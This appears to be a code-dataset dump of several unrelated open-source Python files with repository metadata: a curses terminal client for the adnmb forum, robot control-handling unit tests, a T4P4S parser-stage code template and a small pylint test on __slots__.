pad_b.addstr("[" + str(i) + "]")
pad_b.move(y, pi[0])
pad_b.addstr(d['userid'][0], d['userid'][1])
pad_b.move(y, pi[1])
pad_b.addstr("No." + d['id'][0], d['id'][1])
if v_type == 'forum':
pad_b.move(y, pi[2])
pad_b.addstr("[" + d['rC'][0] + "]", d['rC'][1])
pad_b.move(y, pi[3])
pad_b.move(y + 1, 0)
# 串内容
pad_b.addstr(d['content'][0], d['content'][1])
pad_b.move(pad_b.getyx()[0] + 1, 0)
pad_b.addstr("-" * int(curses.COLS / 3), 0)
pad_b.move(pad_b.getyx()[0] + 2, 0)
cont['browse_now_line'] = 0
cont['browse_end_line'] = pad_b.getyx()[0] - 2
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def forum(fid: str, page: int = 1):
"""
访问指定版块
:param fid: 指定版块id
:param page: 指定页数
"""
global cont
cont['now_page'] = page
r = api.get_showf(fid, page)
if type(r.json()) is list:
cont['input_command_info'] = ""
forum_data_process(r.json(), page)
pad_browse_update('forum', page)
t = 'location'
cont[t][0], cont[t][1], cont[t][3], cont['location_text'] = \
"forum", fid, page, forum_list[fid]
# pad_info_print(cont['location'][1])
else:
pad_info_print(r.json())
def thread(tid: str, page: int = 1):
"""
访问指定串
:param tid: 指定串号
:param page: 指定页数
"""
global cont
cont['now_page'] = page
r = api.get_thread(tid, page)
if type(r.json()) is not str:
cont['input_command_info'] = ""
thread_data_process(r.json(), page)
pad_browse_update('thread', page)
t = 'location'
cont[t][0], cont[t][1], cont[t][2], cont[t][3], cont['location_text'] = \
"thread", post_list['fid'], tid, page, forum_list[r.json()['fid']] + "/No." + tid
# pad_info_print(cont['back_list'][-1][2])
else:
pad_info_print(r.json())
def pad_control_update():
"""
根据cont的信息更新控制栏pad
"""
icc = ""
for i in cont['input_command_char']:
icc += i
pad_c.clear()
pad_c.move(0, 0)
pad_c.addstr(0, 0, conf['command_char'])
pad_c.addstr(0, 20, cont['location_text'])
pad_c.addstr(0, 2, cont['input_command_info'])
pad_c.addstr(0, 8, icc)
if cont['input_command_info'] == "" and icc == "":
pad_c.move(0, 2)
pad_c.refresh(0, 0, curses.LINES - 1, 0, curses.LINES - 1, curses.COLS - 1)
def print_forum_list():
"""
打印版块列表
"""
pad_b.clear()
pad_b.move(0, 0)
cols_count = 0
cont['location'][0] = "forum_list"
for i in forum_list.keys():
pad_b.addstr(i + (5 - len(i)) * " " + forum_list[i], 0)
cols_count += 18
if (curses.COLS - cols_count) > 18:
pad_b.move(pad_b.getyx()[0], cols_count)
pad_b.addstr("|")
else:
pad_b.move(pad_b.getyx()[0] + 1, 0)
cols_count = 0
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def control_visit(v_type: str):
"""
访问版块或串号,调用后从pad_c捕获用户键盘输入
:param v_type: forum/thread
"""
global cont
cont['input_command_char'] = []
if v_type == 'forum':
cont['input_command_info'] = "版号:"
char_max_len = 4
char_ord_list = [45] + list(range(48, 58))
elif v_type == "thread":
cont['input_command_info'] = "串号:"
char_max_len = 8
char_ord_list = list(range(48, 58))
pad_control_update()
while True:
cc = pad_c.getch()
if cc in char_ord_list and len(cont['input_command_char']) <= char_max_len:
# 符合限制规则且已输入内容不超过最大长度
cont['input_command_char'].append(chr(cc))
pad_control_update()
elif (cc == 127 or cc == 263) and cont['input_command_char']:
# Backspace/退格键
cont['input_command_char'].pop()
pad_control_update()
elif cc == 10 and cont['input_command_char']:
# Enter/回车键
tmp = ""
for i in cont['input_command_char']:
tmp += i
if v_type == "forum":
forum(tmp)
elif v_type == "thread":
thread(tmp)
break
elif cc == ord('q'):
break
def go_thread():
"""
访问指定串,根据pad_browse_update()提示的序号
"""
global cont
cont['input_command_char'] = []
cont['input_command_info'] = "序号: "
pad_control_update()
while True:
cc = pad_c.getch()
if cc in list(range(45, 58)) and len(cont['input_command_char']) <= 2:
# 符合限制规则且长度不大于2
cont['input_command_char'].append(chr(cc))
pad_control_update()
elif (cc == 127 or cc == 263) and cont['input_command_char']:
# Backspace/退格键
cont['input_command_char'].pop()
pad_control_update()
elif cc == 10 and cont['input_command_char']:
# Enter/回车键
tmp = ""
for i in cont['input_command_char']:
tmp += i
tmp = thread_list[str(cont['now_page'])][int(tmp)]['id'][0]
thread(tmp)
break
elif cc == ord('q'):
curses_end()
def page_down():
"""
使pad_b向下翻页,一次翻10行
TODO: 后期加入自定义行数或者翻页半屏/全屏
"""
global cont
i = cont['browse_end_line'] - (curses.LINES - 3)
j = i - cont['browse_now_line']
if j >= 10:
cont['browse_now_line'] += 10
elif j > 0:
cont['browse_now_line'] += j
pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def page_up():
"""
使pad_b向上翻页,一次10行
TODO: 后期尝试将page_down和page_up合并
"""
global cont
i = cont['browse_now_line']
if i >= 10:
cont['browse_now_line'] -= 10
elif 0 < i < 10:
cont['browse_now_line'] -= i
pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def next_page():
"""
访问版块的下一页
"""
global cont
if cont['location'][0] == "forum":
cont['now_page'] += 1
forum(cont['location'][1], cont['now_page'])
elif cont['location'][0] == "thread":
# 判断访问的页数是否大于串页数,从串回复数量计算
x = int(post_list['rC'])
n = (int(x / 18) if (x % 18 == 0) else int(x / 18) + 1)
if cont['now_page'] < n:
cont['now_page'] += 1
thread(cont['location'][2], cont['now_page'])
def previous_page():
"""
访问版块或串的上一页
"""
global cont
if cont['location'][0] == "forum" and cont['now_page'] > 0:
cont['now_page'] -= 1
forum(cont['location'][1], cont['now_page'])
elif cont['location'][0] == "thread" and cont['now_page'] > 0:
cont['now_page'] -= 1
thread(cont['location'][2], cont['now_page'])
| 27.465368 | 96 | 0.533691 | import re
import curses
import config
import time
import api
# 自定义的所有函数
# conf: 从config获取来自默认或者用户定义的配置信息
conf = config.config_info
# cont: 在运行过程中保存关于运行状态以及用于控制的信息
cont = config.control_info
# 全局使用,当前所访问版块的全部内容
thread_list = {}
# 全局使用,当前所访问的串的全部内容
post_list = {}
# TODO:注释
cont['browse_now_list'] = 0
# TODO: 需要把自定义版块,目前为直接获取
forum_list = api.get_forum_list('adnmb')
ss = pad_b = pad_i = pad_c = None
def curses_end():
ss.keypad(False)
curses.nocbreak()
curses.echo()
curses.endwin()
def stdscr_pad(stdscr: object, pad_browse: object, pad_info: object, pad_control: object):
"""
传入stdscr和3个pad对象,供所有函数操作
"""
global ss, pad_b, pad_i, pad_c
ss = stdscr
pad_b = pad_browse
pad_i = pad_info
pad_c = pad_control
def pad_browse_print(text: str):
"""
向浏览区pad输出内容
:param text: 文本内容
"""
pad_b.clear()
pad_b.addstr(0, 0, text)
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def pad_info_print(text: str):
"""
向信息提示栏输出内容
:param text: 文本内容,显示长度应不大于终端宽度
"""
pad_i.clear()
pad_i.addstr(0, 0, text)
y = curses.LINES - 2
pad_i.refresh(0, 0, y, 0, y, curses.COLS - 1)
def init_pair_color():
"""
根据配色方案定义的颜色初始化颜色,需要在终端初始化之后再运行
"""
c = config.color_info[0]
for i in c.keys():
curses.init_pair(int(i), c[i][0], c[i][1])
def id_color(admin: str, user_id: str = None, po_id: str = None) -> int:
"""
从配色方案定义id的颜色标识(curses颜色标识通过bit位组合)
:param admin: 是否红名标识符
:param user_id: post的用户id
:param po_id: po主的id
:return: curses的颜色标识符
"""
# TODO: Po id的颜色定义
c0 = config.color_info[0]
c1 = config.color_info[1]
color_code = 0
if admin == '1':
color_code = curses.color_pair(c1["admin_id"]) + c0[str(c1["admin_id"])][2]
if user_id == po_id:
color_code = curses.color_pair(c1["admin_po_id"]) + c0[str(c1["admin_po_id"])][2]
elif user_id == po_id:
color_code = curses.color_pair(c1["po_id"]) + c0[str(c1["po_id"])][2]
return color_code
def show_time(post_time: str) -> str:
"""
把从Api获取到的时间格式转为自定义的格式
:param post_time: 从api的json获取到的原时间
:return: 自定义事件格式
"""
timestamp_int = int(
time.mktime(time.strptime(re.sub(r"\(.*\)", " ", post_time), "%Y-%m-%d %H:%M:%S")))
return time.strftime(conf['time_format'], time.localtime(timestamp_int))
def content_process(text: str) -> str:
"""
简单处理掉一些不必要的内容
<br />, \r
:param text:
:return:
"""
text = re.sub(r"<br />|\r", "", text)
# data = ""
# n = 0
# for i in text:
# if i == "\n":
# n += 1
# if n == config_info['thread_content_line']:
# break
# data += i
return text
def forum_data_process(data: list, page: int):
"""
处理从API获取到的版块串列表,以page为key存储到thread_list中
:param data: 从api获取的json
:param page: 页数
"""
global thread_list
thread_list[str(page)] = []
"""
数据说明:
id: 串号
userid: po的饼干
f_name: 版块名
now: 自定义格式化之后的事件
content: 串内容
rC: 串回复数量
"""
for i in range(len(data)):
d = data[i]
thread_list[str(page)].append(
{
'id': [d['id'], 0],
'userid': [d['userid'], id_color(d['userid'], d['admin'])],
'f_name': ['', 0],
'now': [show_time(d['now']), 0],
'content': [content_process(d['content']), 0],
'rC': [d['replyCount'], 0]
}
)
if 'fid' in data[1].keys():
for i in range(len(data)):
thread_list[str(page)][i]['f_name'] = [forum_list[data[i]['fid']], 0]
def thread_data_process(data: dict, page: int = 1):
"""
处理从API获取到的串回复列表,以page为key存储到post_list中
"""
global post_list
# 存储(串号,饼干等……)时为list,[内容,配色]
c = config.color_info[1]
p = curses.color_pair
post_list[str(page)] = []
# 将串基本信息对应id存储
post_list['po_id'] = data['userid']
post_list['tid'] = data['id']
post_list['fid'] = data['fid']
post_list['rC'] = data['replyCount']
if page == 1:
post_list[str(page)].append({
'id': [data['id'], p(c["post_id"])],
'userid': [data['userid'], id_color(data['admin'], data['userid'], data['userid'])],
'now': [show_time(data['now']), p(c["time"])],
'content': [data['content'], p(c["content"])]
})
data = data['replys']
for i in range(len(data)):
d = data[i]
post_list[str(page)].append(
{
'id': [str(d['id']), p(c["post_id"])],
'userid': [d['userid'], id_color(d['admin'], d['userid'], post_list['po_id'])],
'now': [show_time(d['now']), p(c["time"])],
'content': [d['content'], p(c["content"])]
}
)
def pad_browse_update(v_type: str, page: int):
"""
从全局变量thread_list或post_list更新浏览区
:param v_type: forum, thread
:param page: 页数
"""
pad_b.move(0, 0)
data = None
global thread_list, post_list, cont
if v_type == 'forum':
data = thread_list[str(page)]
elif v_type == 'thread':
data = post_list[str(page)]
pad_b.clear()
for i in range(len(data)):
# 串信息:序号 串号 饼干 回复数 版块名
y = pad_b.getyx()[0]
pi = conf['theme']
d = data[i]
pad_b.addstr("[" + str(i) + "]")
pad_b.move(y, pi[0])
pad_b.addstr(d['userid'][0], d['userid'][1])
pad_b.move(y, pi[1])
pad_b.addstr("No." + d['id'][0], d['id'][1])
if v_type == 'forum':
pad_b.move(y, pi[2])
pad_b.addstr("[" + d['rC'][0] + "]", d['rC'][1])
pad_b.move(y, pi[3])
pad_b.move(y + 1, 0)
# 串内容
pad_b.addstr(d['content'][0], d['content'][1])
pad_b.move(pad_b.getyx()[0] + 1, 0)
pad_b.addstr("-" * int(curses.COLS / 3), 0)
pad_b.move(pad_b.getyx()[0] + 2, 0)
cont['browse_now_line'] = 0
cont['browse_end_line'] = pad_b.getyx()[0] - 2
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def forum(fid: str, page: int = 1):
"""
访问指定版块
:param fid: 指定版块id
:param page: 指定页数
"""
global cont
cont['now_page'] = page
r = api.get_showf(fid, page)
if type(r.json()) is list:
cont['input_command_info'] = ""
forum_data_process(r.json(), page)
pad_browse_update('forum', page)
t = 'location'
cont[t][0], cont[t][1], cont[t][3], cont['location_text'] = \
"forum", fid, page, forum_list[fid]
# pad_info_print(cont['location'][1])
else:
pad_info_print(r.json())
def thread(tid: str, page: int = 1):
"""
访问指定串
:param tid: 指定串号
:param page: 指定页数
"""
global cont
cont['now_page'] = page
r = api.get_thread(tid, page)
if type(r.json()) is not str:
cont['input_command_info'] = ""
thread_data_process(r.json(), page)
pad_browse_update('thread', page)
t = 'location'
cont[t][0], cont[t][1], cont[t][2], cont[t][3], cont['location_text'] = \
"thread", post_list['fid'], tid, page, forum_list[r.json()['fid']] + "/No." + tid
# pad_info_print(cont['back_list'][-1][2])
else:
pad_info_print(r.json())
def pad_control_update():
"""
根据cont的信息更新控制栏pad
"""
icc = ""
for i in cont['input_command_char']:
icc += i
pad_c.clear()
pad_c.move(0, 0)
pad_c.addstr(0, 0, conf['command_char'])
pad_c.addstr(0, 20, cont['location_text'])
pad_c.addstr(0, 2, cont['input_command_info'])
pad_c.addstr(0, 8, icc)
if cont['input_command_info'] == "" and icc == "":
pad_c.move(0, 2)
pad_c.refresh(0, 0, curses.LINES - 1, 0, curses.LINES - 1, curses.COLS - 1)
def print_forum_list():
"""
打印版块列表
"""
pad_b.clear()
pad_b.move(0, 0)
cols_count = 0
cont['location'][0] = "forum_list"
for i in forum_list.keys():
pad_b.addstr(i + (5 - len(i)) * " " + forum_list[i], 0)
cols_count += 18
if (curses.COLS - cols_count) > 18:
pad_b.move(pad_b.getyx()[0], cols_count)
pad_b.addstr("|")
else:
pad_b.move(pad_b.getyx()[0] + 1, 0)
cols_count = 0
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def control_visit(v_type: str):
"""
访问版块或串号,调用后从pad_c捕获用户键盘输入
:param v_type: forum/thread
"""
global cont
cont['input_command_char'] = []
if v_type == 'forum':
cont['input_command_info'] = "版号:"
char_max_len = 4
char_ord_list = [45] + list(range(48, 58))
elif v_type == "thread":
cont['input_command_info'] = "串号:"
char_max_len = 8
char_ord_list = list(range(48, 58))
pad_control_update()
while True:
cc = pad_c.getch()
if cc in char_ord_list and len(cont['input_command_char']) <= char_max_len:
# 符合限制规则且已输入内容不超过最大长度
cont['input_command_char'].append(chr(cc))
pad_control_update()
elif (cc == 127 or cc == 263) and cont['input_command_char']:
# Backspace/退格键
cont['input_command_char'].pop()
pad_control_update()
elif cc == 10 and cont['input_command_char']:
# Enter/回车键
tmp = ""
for i in cont['input_command_char']:
tmp += i
if v_type == "forum":
forum(tmp)
elif v_type == "thread":
thread(tmp)
break
elif cc == ord('q'):
break
def go_thread():
"""
访问指定串,根据pad_browse_update()提示的序号
"""
global cont
cont['input_command_char'] = []
cont['input_command_info'] = "序号: "
pad_control_update()
while True:
cc = pad_c.getch()
if cc in list(range(45, 58)) and len(cont['input_command_char']) <= 2:
# 符合限制规则且长度不大于2
cont['input_command_char'].append(chr(cc))
pad_control_update()
elif (cc == 127 or cc == 263) and cont['input_command_char']:
# Backspace/退格键
cont['input_command_char'].pop()
pad_control_update()
elif cc == 10 and cont['input_command_char']:
# Enter/回车键
tmp = ""
for i in cont['input_command_char']:
tmp += i
tmp = thread_list[str(cont['now_page'])][int(tmp)]['id'][0]
thread(tmp)
break
elif cc == ord('q'):
curses_end()
def page_down():
"""
使pad_b向下翻页,一次翻10行
TODO: 后期加入自定义行数或者翻页半屏/全屏
"""
global cont
i = cont['browse_end_line'] - (curses.LINES - 3)
j = i - cont['browse_now_line']
if j >= 10:
cont['browse_now_line'] += 10
elif j > 0:
cont['browse_now_line'] += j
pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def page_up():
"""
使pad_b向上翻页,一次10行
TODO: 后期尝试将page_down和page_up合并
"""
global cont
i = cont['browse_now_line']
if i >= 10:
cont['browse_now_line'] -= 10
elif 0 < i < 10:
cont['browse_now_line'] -= i
pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def next_page():
"""
访问版块的下一页
"""
global cont
if cont['location'][0] == "forum":
cont['now_page'] += 1
forum(cont['location'][1], cont['now_page'])
elif cont['location'][0] == "thread":
# 判断访问的页数是否大于串页数,从串回复数量计算
x = int(post_list['rC'])
n = (int(x / 18) if (x % 18 == 0) else int(x / 18) + 1)
if cont['now_page'] < n:
cont['now_page'] += 1
thread(cont['location'][2], cont['now_page'])
def previous_page():
"""
访问版块或串的上一页
"""
global cont
if cont['location'][0] == "forum" and cont['now_page'] > 0:
cont['now_page'] -= 1
forum(cont['location'][1], cont['now_page'])
elif cont['location'][0] == "thread" and cont['now_page'] > 0:
cont['now_page'] -= 1
thread(cont['location'][2], cont['now_page'])
def back():
bl = cont['back_list']
if len(bl) > 1:
if bl[-2][0] is not None:
# pad_info_print(str(bl[-1][2]))
if bl[-2][0] == "forum":
# pad_info_print("a")
forum(bl[-2][1])
cont['back_list'].pop()
elif bl[-2][0] == "thread":
# pad_info_print("b")
thread(bl[-2][2])
cont['back_list'].pop()
elif bl[-2][0] == "forum_list":
print_forum_list()
| 573 | 0 | 46 |
51f226bec2148468c07bafa983dd37d9c64a9486 | 4,752 | py | Python | server/volumes/brain_src/test/test_control_handling.py | paul-felt/geppetto | 05596c37f63c1e89132cf3e07f9e8d7966766916 | [
"MIT"
] | null | null | null | server/volumes/brain_src/test/test_control_handling.py | paul-felt/geppetto | 05596c37f63c1e89132cf3e07f9e8d7966766916 | [
"MIT"
] | null | null | null | server/volumes/brain_src/test/test_control_handling.py | paul-felt/geppetto | 05596c37f63c1e89132cf3e07f9e8d7966766916 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
import base64
from brain import control_handling
from brain import constants
claw_control_info = {
constants.SIGNAL_NAME: 'claw',
constants.SIGNAL_LIMITS: [100.0, 400.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.claw',
}
twist_control_info = {
constants.SIGNAL_NAME: 'twist',
constants.SIGNAL_LIMITS: [100.0, 500.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.twist',
}
if __name__ == '__main__':
unittest.main()
| 39.932773 | 112 | 0.611742 | import unittest
import numpy as np
import base64
from brain import control_handling
from brain import constants
claw_control_info = {
constants.SIGNAL_NAME: 'claw',
constants.SIGNAL_LIMITS: [100.0, 400.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.claw',
}
twist_control_info = {
constants.SIGNAL_NAME: 'twist',
constants.SIGNAL_LIMITS: [100.0, 500.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.twist',
}
class TestControlHandling(unittest.TestCase):
# example assertions
#self.assertEqual('foo'.upper(), 'FOO')
#self.assertTrue('FOO'.isupper())
#self.assertFalse('Foo'.isupper())
#with self.assertRaises(TypeError):
# s.split(2)
def test_format_control_output(self):
data = [
{
constants.SIGNAL_NAME: "bogus",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 100,
constants.SIGNAL_TS: 1,
},
{
constants.SIGNAL_NAME: "claw",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 100,
constants.SIGNAL_TS: 2,
},
{
constants.SIGNAL_NAME: "twist",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 500,
constants.SIGNAL_TS: 3,
},
{
constants.SIGNAL_NAME: "claw",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 250,
constants.SIGNAL_TS: 4,
},
]
batch = control_handling.format_data(data, control_infos = [claw_control_info, twist_control_info])
#print('aaa',batch.keys())
self.assertEqual(batch.keys(), set(['claw', 'claw_mask', 'twist', 'twist_mask']))
#print('bbb claw_mask',batch['claw_mask'])
self.assertTrue( np.all( batch['claw_mask'] == [0,1,0,1] ) )
#print('ccc claw',batch['claw'])
self.assertTrue( np.all( batch['claw'] == [0.5, 0.0, 0.0, 0.5] ) )
#print('ddd twist_mask',batch['twist_mask'])
self.assertTrue( np.all( batch['twist_mask'] == [0,0,1,0]) )
#print('eee twist',batch['twist'])
self.assertTrue( np.all( batch['twist'] == [0.5, 0.5, 1.0, 1.0] ) )
def test_format_control_output_empty(self):
' make sure an empty batch (just sensors) gives us default values for all controls '
data = [
{
constants.SIGNAL_NAME: "bogus",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_SENSOR,
constants.SIGNAL_VALUE: 100,
constants.SIGNAL_TS: 1,
},
]
batch = control_handling.format_data(data, control_infos = [claw_control_info, twist_control_info])
self.assertEqual(batch.keys(), set(['claw', 'claw_mask', 'twist', 'twist_mask']))
#print('bbb claw_mask',batch['claw_mask'])
self.assertTrue( np.all( batch['claw_mask'] == [0] ) )
#print('ccc claw',batch['claw'])
self.assertTrue( np.all( batch['claw'] == [0.5] ) )
def test_scale_between_0_and_1(self):
self.assertEqual( 0.0, control_handling.scale_between_0_and_1(100, claw_control_info) )
self.assertEqual( 0.5, control_handling.scale_between_0_and_1(250, claw_control_info) )
self.assertEqual( 1.0, control_handling.scale_between_0_and_1(400, claw_control_info) )
def test_to_control_limits(self):
self.assertEqual( 100, control_handling.scale_to_control_limits(0.0, claw_control_info) )
self.assertEqual( 250, control_handling.scale_to_control_limits(0.5, claw_control_info) )
self.assertEqual( 400, control_handling.scale_to_control_limits(1.0, claw_control_info) )
def test_shift_forward(self):
batch = {
'a': np.array([2,4,6,8], dtype='float32'),
'b': np.array([1,3,5,7], dtype='float32'),
}
shifted_batch = control_handling.shift_forward(batch, prefix='prev_', default=0.5)
#print('shifted batch==%s'%shifted_batch)
self.assertTrue(np.all( shifted_batch['prev_a'] == [0.5, 2, 4, 6] ) )
self.assertTrue(np.all( shifted_batch['prev_b'] == [0.5, 1, 3, 5] ) )
shifted_batch = control_handling.shift_forward(batch, prefix='prev_', prev_batch={'a':[0.4], 'b':[0.3]})
#print('shifted batch==%s'%shifted_batch)
self.assertTrue(np.all( shifted_batch['prev_a'] == [0.4, 2, 4, 6] ) )
self.assertTrue(np.all( shifted_batch['prev_b'] == [0.3, 1, 3, 5] ) )
if __name__ == '__main__':
unittest.main()
| 3,055 | 1,155 | 23 |
1b9f3e6d5112c9b28a120b41422bd49f725e07ba | 2,847 | py | Python | src/hardware_indep/multi/parser.stage.c.py | GEANT-DataPlaneProgramming/t4p4s | 334dec8e941ed7526d320fc1697ad7a30c3709fb | [
"Apache-2.0"
] | 4 | 2021-12-10T19:06:51.000Z | 2022-01-06T19:52:46.000Z | src/hardware_indep/multi/parser.stage.c.py | GEANT-DataPlaneProgramming/t4p4s | 334dec8e941ed7526d320fc1697ad7a30c3709fb | [
"Apache-2.0"
] | null | null | null | src/hardware_indep/multi/parser.stage.c.py | GEANT-DataPlaneProgramming/t4p4s | 334dec8e941ed7526d320fc1697ad7a30c3709fb | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
# Copyright 2021 Eotvos Lorand University, Budapest, Hungary
compiler_common.current_compilation['is_multicompiled'] = True
part_count = compiler_common.current_compilation['multi']
multi_idx = compiler_common.current_compilation['multi_idx']
table_names = (table.short_name + ("/keyless" if table.key_length_bits == 0 else "") + ("/hidden" if table.is_hidden else "") for table in hlir.tables)
all_table_infos = sorted(zip(hlir.tables, table_names), key=lambda k: len(k[0].actions))
table_infos = list(ti for idx, ti in enumerate(all_table_infos) if idx % part_count == multi_idx)
all_hdrs = sorted(hlir.header_instances.filterfalse(lambda hdr: hdr.urtype.is_metadata), key=lambda hdr: len(hdr.urtype.fields))
hdrs = list(hdr for idx, hdr in enumerate(all_hdrs) if idx % part_count == multi_idx)
if hdrs == []:
compiler_common.current_compilation['skip_output'] = True
else:
for hdr in hdrs:
#[ #include "parser_stages.h"
#{ int parser_extract_${hdr.name}(uint32_t vwlen, STDPARAMS) {
#[ uint32_t value32; (void)value32;
#[ uint32_t res32; (void)res32;
#[ parser_state_t* local_vars = pstate;
hdrtype = hdr.urtype
is_vw = hdrtype.is_vw
#[ uint32_t hdrlen = (${hdr.urtype.size} + vwlen) / 8;
#{ if (unlikely(pd->parsed_length + hdrlen > pd->wrapper->pkt_len)) {
#[ cannot_parse_hdr("${"variable width " if is_vw else ""}", "${hdr.name}", hdrlen, STDPARAMS_IN);
#[ return -1; // parsed after end of packet
#} }
if 'stack' in hdr and hdr.stack is not None:
#[ stk_next(STK(${hdr.stack.name}), pd);
#[ header_instance_t hdrinst = stk_current(STK(${hdr.stack.name}), pd);
else:
#[ header_instance_t hdrinst = HDR(${hdr.name});
#[ header_descriptor_t* hdr = &(pd->headers[hdrinst]);
#[ hdr->pointer = pd->extract_ptr;
#[ hdr->was_enabled_at_initial_parse = true;
#[ hdr->length = hdrlen;
#[ hdr->var_width_field_bitwidth = vwlen;
for fld in hdrtype.fields:
if fld.preparsed and fld.size <= 32:
#[ EXTRACT_INT32_AUTO_PACKET(pd, hdr, FLD(hdr,${fld.name}), value32)
#[ pd->fields.FLD(hdr,${fld.name}) = value32;
#[ pd->fields.ATTRFLD(hdr,${fld.name}) = NOT_MODIFIED;
#[ dbg_bytes(hdr->pointer, hdr->length,
#[ " :: Parsed ${"variable width " if is_vw else ""}header" T4LIT(#%d) " " T4LIT(%s,header) "/$${}{%dB}: ", hdr_infos[hdrinst].idx, hdr_infos[hdrinst].name, hdr->length);
#[ pd->parsed_length += hdrlen;
#[ pd->extract_ptr += hdrlen;
#[ return hdrlen;
#} }
#[
| 44.484375 | 194 | 0.600281 | # SPDX-License-Identifier: Apache-2.0
# Copyright 2021 Eotvos Lorand University, Budapest, Hungary
compiler_common.current_compilation['is_multicompiled'] = True
part_count = compiler_common.current_compilation['multi']
multi_idx = compiler_common.current_compilation['multi_idx']
table_names = (table.short_name + ("/keyless" if table.key_length_bits == 0 else "") + ("/hidden" if table.is_hidden else "") for table in hlir.tables)
all_table_infos = sorted(zip(hlir.tables, table_names), key=lambda k: len(k[0].actions))
table_infos = list(ti for idx, ti in enumerate(all_table_infos) if idx % part_count == multi_idx)
all_hdrs = sorted(hlir.header_instances.filterfalse(lambda hdr: hdr.urtype.is_metadata), key=lambda hdr: len(hdr.urtype.fields))
hdrs = list(hdr for idx, hdr in enumerate(all_hdrs) if idx % part_count == multi_idx)
if hdrs == []:
compiler_common.current_compilation['skip_output'] = True
else:
for hdr in hdrs:
#[ #include "parser_stages.h"
#{ int parser_extract_${hdr.name}(uint32_t vwlen, STDPARAMS) {
#[ uint32_t value32; (void)value32;
#[ uint32_t res32; (void)res32;
#[ parser_state_t* local_vars = pstate;
hdrtype = hdr.urtype
is_vw = hdrtype.is_vw
#[ uint32_t hdrlen = (${hdr.urtype.size} + vwlen) / 8;
#{ if (unlikely(pd->parsed_length + hdrlen > pd->wrapper->pkt_len)) {
#[ cannot_parse_hdr("${"variable width " if is_vw else ""}", "${hdr.name}", hdrlen, STDPARAMS_IN);
#[ return -1; // parsed after end of packet
#} }
if 'stack' in hdr and hdr.stack is not None:
#[ stk_next(STK(${hdr.stack.name}), pd);
#[ header_instance_t hdrinst = stk_current(STK(${hdr.stack.name}), pd);
else:
#[ header_instance_t hdrinst = HDR(${hdr.name});
#[ header_descriptor_t* hdr = &(pd->headers[hdrinst]);
#[ hdr->pointer = pd->extract_ptr;
#[ hdr->was_enabled_at_initial_parse = true;
#[ hdr->length = hdrlen;
#[ hdr->var_width_field_bitwidth = vwlen;
for fld in hdrtype.fields:
if fld.preparsed and fld.size <= 32:
#[ EXTRACT_INT32_AUTO_PACKET(pd, hdr, FLD(hdr,${fld.name}), value32)
#[ pd->fields.FLD(hdr,${fld.name}) = value32;
#[ pd->fields.ATTRFLD(hdr,${fld.name}) = NOT_MODIFIED;
#[ dbg_bytes(hdr->pointer, hdr->length,
#[ " :: Parsed ${"variable width " if is_vw else ""}header" T4LIT(#%d) " " T4LIT(%s,header) "/$${}{%dB}: ", hdr_infos[hdrinst].idx, hdr_infos[hdrinst].name, hdr->length);
#[ pd->parsed_length += hdrlen;
#[ pd->extract_ptr += hdrlen;
#[ return hdrlen;
#} }
#[
| 0 | 0 | 0 |
f01c40eda22ce2dbb9c545cd950b4f467984b666 | 285 | py | Python | venv/lib/python2.7/site-packages/pylint/test/input/func_newstyle___slots__.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/pylint/test/input/func_newstyle___slots__.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | 7 | 2021-02-08T20:22:15.000Z | 2022-03-11T23:19:41.000Z | venv/lib/python2.7/site-packages/pylint/test/input/func_newstyle___slots__.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | # pylint: disable=R0903
"""test __slots__ on old style class"""
__revision__ = 1
class OkOk(object):
"""correct usage"""
__slots__ = ('a', 'b')
class HaNonNonNon:
"""bad usage"""
__slots__ = ('a', 'b')
__slots__ = 'hop' # pfff
| 15.833333 | 39 | 0.585965 | # pylint: disable=R0903
"""test __slots__ on old style class"""
__revision__ = 1
class OkOk(object):
"""correct usage"""
__slots__ = ('a', 'b')
class HaNonNonNon:
"""bad usage"""
__slots__ = ('a', 'b')
def __init__(self):
pass
__slots__ = 'hop' # pfff
| 11 | 0 | 27 |
4ae2d6e7ad5b3277cfeece0959766a37d3ee5322 | 3,576 | py | Python | redis_consumer/consumers/spot_consumer_test.py | vanvalenlab/tf-serving-redis-interface | f696c05ee622ac6cc38dc1afcef2379d2ea9d9f0 | [
"Apache-2.0"
] | null | null | null | redis_consumer/consumers/spot_consumer_test.py | vanvalenlab/tf-serving-redis-interface | f696c05ee622ac6cc38dc1afcef2379d2ea9d9f0 | [
"Apache-2.0"
] | null | null | null | redis_consumer/consumers/spot_consumer_test.py | vanvalenlab/tf-serving-redis-interface | f696c05ee622ac6cc38dc1afcef2379d2ea9d9f0 | [
"Apache-2.0"
